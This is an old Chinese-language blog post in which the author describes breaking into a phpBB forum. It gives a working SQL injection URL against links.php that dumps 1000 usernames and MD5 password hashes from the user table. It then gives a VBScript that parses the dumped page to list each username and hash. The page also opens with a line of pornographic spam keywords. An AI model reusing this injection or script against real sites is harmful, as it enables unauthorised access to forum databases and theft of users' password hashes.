欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一段提取用戶名和md5的vbs代碼

 更新時(shí)間:2008年10月24日 00:51:28   作者:  
搞了個(gè)phpbb的站,用的是很老的links.php漏洞了。
注入代碼如下:

links.php?t=search&search_keywords=asd&start=1,1 UNION SELECT 1,username,user_password,4,5,6,7,8,9,10,11,12,13 FROM phpbb_users where user_id limit 0,1000/*

這樣就提取了1000個(gè)用戶名和md5,將上邊的保存成htm,要挨個(gè)提取出md5和用戶名很麻煩,寫了段代碼。這段代碼我很滿意,估計(jì)是最簡(jiǎn)單的提取方法了,呵呵。

代碼如下:

'用法示例:cscript //Nologo this.vbs c:\11000.htm >c:\1.txt
復(fù)制代碼 代碼如下:

on error resume Next
Set ie=WScript.CreateObject("InternetExplorer.Application")
set arg=wscript.arguments
if arg.count=0 then wscript.quit
ie.visible=false
ie.navigate arg(0)
While ie.Busy
WScript.Sleep 100
Wend
Do
Wscript.Sleep 200
Loop Until ie.ReadyState=4
For i=12 To ie.Document.links.length-2
data=ie.Document.links(i).innerText
If data <>13 Then
wscript.echo data
wscript.echo ie.Document.links(i).alt
End if
next
msgbox "轉(zhuǎn)換完畢"

相關(guān)文章

最新評(píng)論